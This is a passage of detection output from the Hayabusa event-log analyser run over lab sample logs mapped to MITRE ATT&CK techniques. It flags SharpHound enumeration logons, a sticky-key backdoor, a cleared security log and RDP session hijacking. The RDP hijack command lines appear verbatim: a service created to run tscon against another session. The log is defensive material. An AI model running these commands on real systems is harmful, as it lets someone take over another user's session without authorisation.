Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.686 +00:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.687 +00:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.687 +00:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - 
Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.688 +00:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.689 +00:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.689 +00:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.689 +00:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.690 +00:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.691 +00:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.712 +00:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.713 +00:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.713 +00:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.714 +00:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.715 +00:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.718 +00:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.722 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.733 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.734 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.735 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.742 +00:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.742 +00:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.752 +00:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.753 +00:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.753 +00:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.762 +00:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.762 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.771 +00:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.771 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.772 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.773 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.773 +00:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.773 +00:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.774 +00:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.775 +00:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.775 +00:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 12:06:57.954 +00:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\windows\system32\cmd.exe sethc.exe 211 | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: winlogon.exe | LID: 0xb7e34 | PID: 3300 | PGUID: 9828DA72-E761-608F-2A14-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-03 12:06:57.954 +00:00,win10-02.offsec.lan,1,critical,PrivEsc | Persis,Sticky Key Like Backdoor 
Usage,,rules/sigma/process_creation_sysmon/proc_creation_win_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-03 12:07:07.639 +00:00,win10-02.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\mmc.exe | PID: 7272 | PGUID: 9828DA72-683B-6089-DB05-000000000C00",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-14 20:39:33.214 +00:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-14 20:39:35.382 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-14 20:39:35.382 +00:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 
0x13b593d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-14 20:39:35.382 +00:00,fs01.offsec.lan,4688,low,Persis | PrivEsc,New Service Creation,,rules/sigma/process_creation_builtin/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-14 20:39:35.406 +00:00,fs01.offsec.lan,4697,info,Persis,Service Installed,Name: hijackservice | Path: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x13b593d,rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-14 20:40:16.839 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start hijackservice | Path: C:\Windows\System32\sc.exe | PID: 0x1490 | User: admmig | LID: 0x13b593d,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:16.846 +00:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 
20:40:16.846 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:16.853 +00:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\tscon.exe | PID: 0x143c | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:16.856 +00:00,fs01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:18.194 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:18.327 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb4 | User: FS01$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:26.942 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1578 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:29.455 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0x864 | User: admmarsid | LID: 0x6a423",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:29.640 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144c | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:29.676 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | 
PID: 0xe84 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:29.706 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0xcc8 | User: FS01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 21:01:05.352 +00:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-14 21:01:05.352 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-14 21:01:05.358 +00:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\tscon.exe | PID: 0x6e8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 
Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-14 21:01:07.150 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0x460 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-14 21:01:37.111 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1548 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-14 21:02:14.789 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5e8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-14 21:02:35.208 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5b8 | User: FS01$ | LID: 
